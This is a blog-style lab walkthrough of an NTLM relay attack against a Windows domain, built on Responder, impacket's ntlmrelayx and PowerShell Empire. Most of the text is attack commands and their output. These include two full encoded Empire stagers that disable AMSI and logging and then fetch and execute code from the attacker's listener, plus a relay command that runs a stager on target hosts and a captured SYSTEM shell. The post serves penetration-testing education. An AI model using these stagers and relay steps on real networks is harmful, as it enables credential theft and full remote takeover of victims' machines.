Like most my posts, I only scratch the surface and emulate a real attack. I don't go in depth since there are tons of other write-ups out there that do. Instead, I make more of a step-by-step illustration of how the attack was conducted.
To get started, it is important to know the difference between some of the technology:
- NTLMv1/v2 is shorthand for Net-NTLMv1/v2 and are the same thing
- NTLM is difference, since it is the hash stored in the Security Account Manager (SAM) database and in Domain Controllers NTDS.dit database
- You can perform Pass-The-Hash with NTLM hashes
- You cannot perform Pass-The-Hash with Net-NTLM hashes
- NTLM hashes can be obtained via dumping the SAM database, NTDS.dit database or from Mimikatz.
- Net-NTLMv1/v2 (NTLMv1/v2) are obtained through tools like responder.
We first get responder up and running by turning off the SMB and HTTP server within the responder.conf file:
We then get a list of targets that we will be relaying to. To find this, we can use crackmapexec:
root@kali:/opt/Empire# crackmapexec smb 10.10.50.0/24 CME 10.10.50.106:445 LAB-WIN7-01 [*] Windows 7 Professional 7601 Service Pack 1 (name:LAB-WIN7-01) (domain:GEODA-LAB) CME 10.10.50.103:445 LAB-WIN7-02 [*] Windows 7 Professional 7601 Service Pack 1 (name:LAB-WIN7-02) (domain:GEODA-LAB) CME 10.10.50.250:445 LAB-DC01 [*] Windows 6.3 Build 9600 (name:LAB-DC01) (domain:GEODA-LAB) [*] KTHXBYE!
As you can see, crackmapexec was able to find 3 hosts with SMB Signing disabled: LAB-WIN7-01 (10.10.50.106), LAB-WIN7-02 (10.10.50.103) and LAB-DC01 (10.10.50.250). We add these to a target list file:
root@kali:~/LAB/NTLM-relay# echo "10.10.50.103" > targets.txt
root@kali:~/LAB/NTLM-relay# echo "10.10.50.106" >> targets.txt
root@kali:~/LAB/NTLM-relay# echo "10.10.50.250" >> targets.txt
We then create a listener in empire so that when we do catch credentials, we'll relay to our NTLMrelay and execute commands that will spawn an agent. Be sure to use a different port than 80 since that will be the port the NTLM-relay will be using for its HTTP server:
(Empire: listeners/http) > execute [*] Starting listener 'http' * Serving Flask app "http" (lazy loading) * Environment: production WARNING: Do not use the development server in a production environment. Use a production WSGI server instead. * Debug mode: off [+] Listener successfully started! (Empire: listeners/http) > listeners [*] Active listeners: Name Module Host Delay/Jitter KillDate ---- ------ ---- ------------ -------- http http http://10.10.50.101:8888 5/0.0 (Empire: listeners) > launcher powershell http powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAcwBJAE8ATgBUAEEAYgBMAGUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AQQBKAG8AUgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBFAGYAXQAuAEEAcwBzAEUATQBiAGwAeQAuAEcAZQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAGkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAEEAbAB1AEUAKAAkAG4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBMAD0AWwBDAG8AbABsAGUAYwBUAEkATwBOAHMALgBHAEUATgBFAFIAaQBDAC4ARABJAGMAdABpAG8ATgBhAHIAeQBbAHMAdAByAEkAbgBHACwAUwB5AHMAVABlAE0ALgBPAGIASgBlAEMAdABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAGUAewBbAFMAYwBSAGkAUABUAEIAbABPAGMAawBdAC4AIgBHAEUAVABGAGkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBhAEwAdQBlACgAJABuAHUAbABMACwAKABOAEUAdwAtAE8AYgBKAEUAQwB0ACAAQwBPAEwAbABFAGMAVABJAG8ATgBTAC4ARwBlAE4ARQByAGkAYwAuAEgAYQBzAGgAUwBFAHQAWwBzAHQAUgBpAE4ARwBdACkAKQB9AFsAUgBFAEYAXQAuAEEAcwBTAEUATQBiAGwAWQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAFQARgBpAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEATAB1AEUAKAAkAE4AVQBMAEwALAAkAFQAUgBVAGUAKQB9ADsAfQA7AFsAUwBZAFMAVABlAG0ALgBOAEUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgBUAE0AQQBOAEEARwBFAFIAXQA6ADoARQB4AFAAZQBDAHQAMQAwADAAQwBPAG4AdABpAE4AdQBlAD0AMAA7ACQAVwBjAD0ATgBlAFcALQBPAEIASgBlAGMAVAAgAFMAeQBTAHQARQBNAC4ATgBFAFQALgBXAGUAYgBDAGwAaQBlAG4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBhAEQAZQBSAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBvAFgAeQA9AFsAUwBZAFMAdABFAG0ALgBOAGUAdAAuAFcARQBCAFIAZQBxAFUARQBzAHQAXQA6ADoARABFAGYAYQB1AGwAVABXAGUAYgBQAHIATwBYAFkAOwAkAHcAQwAuAFAAcgBPAFgAWQAuAEMAcgBlAGQARQBOAHQASQBBAEwAUwAgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBlAFQALgBDAFIARQBkAEUATgBUAGkAQQBMAEMAYQBDAEgARQBdADoAOgBEAGUAZgBhAHUATABUAE4ARQBUAHcATwByAGsAQwBSAEUAZABlAG4AdABpAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAVABlAE0ALgBUAGUAeABUAC4ARQBOAGMATwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQBUAEUAUwAoACcASgAlAFAASQBdACYATQA2AEsAVQApAE8AIwA/AFcANwB6AFsARABZAHIAZgBSAHYAPABfAGgAdQB3AHsALAAvACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAFUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4ANQAwAC4AMQAwADEAOgA4ADgAOAA4ACcAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkAHcAQwAuAEgARQBBAEQAZQByAFMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AHcASQBGAEIAcQA2AFEAawBLAHkAYgA1ADEAbABuAHMAbgBJAFAATABxAHUAbQBjADUAVwBnAD0AIgApADsAJABEAEEAVABBAD0AJABXAEMALgBEAG8AdwBOAEwATwBBAEQARABhAFQAQQAoACQAcwBFAFIAKwAkAFQAKQA7ACQASQBWAD0AJABkAGEAdABBAFsAMAAuAC4AMwBdADsAJABEAGEAdABBAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAVABhAC4ATABlAG4ARwB0AEgAXQA7AC0ASgBPAGkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAVABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= (Empire: listeners) >
Now that we have everything we need, we fire up impacket's ntlmrelayx.py, targeting our targets file and using our powershell empire payload:
root@kali:/opt/impacket/examples# python ntlmrelayx.py -tf ~/LAB/NTLM-relay/targets.txt -c 'powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAUwBJAE8AbgBUAEEAYgBsAEUALgBQAFMAVgBlAFIAcwBJAE8AbgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AGUAKAAkAE4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBMAD0AWwBDAE8AbABsAEUAYwB0AGkAbwBuAFMALgBHAEUATgBlAHIAaQBjAC4ARABpAGMAVABJAG8ATgBhAHIAeQBbAHMAVAByAEkAbgBHACwAUwBZAFMAdABFAE0ALgBPAGIAagBlAGMAdABdAF0AOgA6AE4ARQBXACgAKQA7ACQAdgBhAGwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEATAB9AEUAbABzAGUAewBbAFMAYwByAEkAUAB0AEIAbABvAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAVQBlACgAJABuAHUATABMACwAKABOAEUAVwAtAE8AQgBqAGUAYwBUACAAQwBPAGwATABlAGMAVABpAE8AbgBTAC4ARwBFAG4ARQByAGkAQwAuAEgAYQBzAGgAUwBFAHQAWwBzAHQAUgBJAG4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAEUATQBCAGwAWQAuAEcARQBUAFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAEUAKAAkAE4AVQBMAEwALAAkAFQAUgB1AGUAKQB9ADsAfQA7AFsAUwBZAHMAdABFAE0ALgBOAEUAVAAuAFMARQBSAHYASQBDAGUAUABvAGkATgB0AE0AQQBuAGEARwBlAFIAXQA6ADoARQBYAHAAZQBDAFQAMQAwADAAQwBPAG4AVABpAG4AVQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAEIAagBFAEMAdAAgAFMAWQBzAFQARQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgAZQBhAEQARQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBPAFgAWQA9AFsAUwBZAHMAdABFAE0ALgBOAGUAdAAuAFcARQBiAFIAZQBxAFUARQBzAFQAXQA6ADoARABFAGYAYQBVAEwAdABXAGUAYgBQAFIAbwBYAHkAOwAkAFcAYwAuAFAAcgBPAHgAWQAuAEMAUgBlAGQAZQBuAHQAaQBhAGwAUwAgAD0AIABbAFMAeQBzAFQARQBtAC4ATgBlAHQALgBDAHIARQBkAEUATgBUAEkAQQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBBAHUAbAB0AE4AZQB0AFcAbwByAGsAQwBSAEUAZABlAE4AVABpAEEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAVABlAG0ALgBUAGUAWAB0AC4ARQBOAEMATwBEAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQBUAEUAUwAoACcASgAlAFAASQBdACYATQA2AEsAVQApAE8AIwA/AFcANwB6AFsARABZAHIAZgBSAHYAPABfAGgAdQB3AHsALAAvACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4ANQAwAC4AMQAwADEAOgA4ADgAOAA4ACcAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAB3AGMALgBIAEUAQQBEAGUAUgBTAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBJAFUARQBLAGQAMwBVAG0AcwBHAG4AeQBPAG0ATgBIAEYASwBCAFEAbAB0AGwAMgBTAEoAQQA9ACIAKQA7ACQAZABhAFQAYQA9ACQAVwBDAC4ARABvAFcAbgBMAG8AQQBEAEQAYQBUAGEAKAAkAFMAZQByACsAJAB0ACkAOwAkAEkAVgA9ACQARABBAFQAQQBbADAALgAuADMAXQA7ACQARABBAFQAQQA9ACQARABhAHQAYQBbADQALgAuACQAZABhAHQAYQAuAEwARQBuAEcAVABIAF0AOwAtAEoATwBJAG4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABBAFQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA' Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies [*] Protocol Client SMB loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Running in relay mode to hosts in targetfile [*] Setting up SMB Server [*] Servers started, waiting for connections [*] Setting up HTTP Server
In another window, we fire up Responder:
root@kali:~/LAB/NTLM-relay# python Responder/Responder.py -I eth0 -r -d -w __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 2.3.3.9 Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C /!\ Warning: files/AccessDenied.html: file not found /!\ Warning: files/BindShell.exe: file not found [+] Poisoners: LLMNR [ON] NBT-NS [ON] DNS/MDNS [ON] [+] Servers: HTTP server [OFF] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [OFF] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Fingerprint hosts [OFF] [+] Generic Options: Responder NIC [eth0] Responder IP [10.10.50.101] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Listening for events...
We then wait.. and see that a shell has been spawned!
In our example, we have a SYSTEM shell since we caught a Domain Admin with our attack:
(Empire: listeners) > agents [*] Active agents: Name Lang Internal IP Machine Name Username Process Delay Last Seen --------- ---- ----------- ------------ --------- ------- ----- -------------------- EGRLSYH1 ps 10.10.50.103 LAB-WIN7-02 GEODA-LAB\chuck powershell/1508 5/0.0 2018-11-02 09:14:40 689TSVGA ps 10.10.50.103 LAB-WIN7-02 *GEODA-LAB\SYSTEM powershell/1464 5/0.0 2018-11-02 13:17:48 (Empire: agents) > interact 689TSVGA (Empire: 689TSVGA) > shell (Empire: 689TSVGA) > shell whoami [*] Tasked 689TSVGA to run TASK_SHELL [*] Agent 689TSVGA tasked with task ID 1 (Empire: 689TSVGA) > [*] Agent 689TSVGA returned results. nt authority\system ..Command execution completed. [*] Valid results returned by 10.10.50.103
This was a very basic example of how using Responder to intercept authentication attempts (Net-NTLM hashes) and using NTLMRelay to pass the hashes to our target list. If any are successful, it will execute our powershell empire script and spawn an Agent.
It is important to note that this only works with SMB Signing Disabled.
Hope this helps!
geoda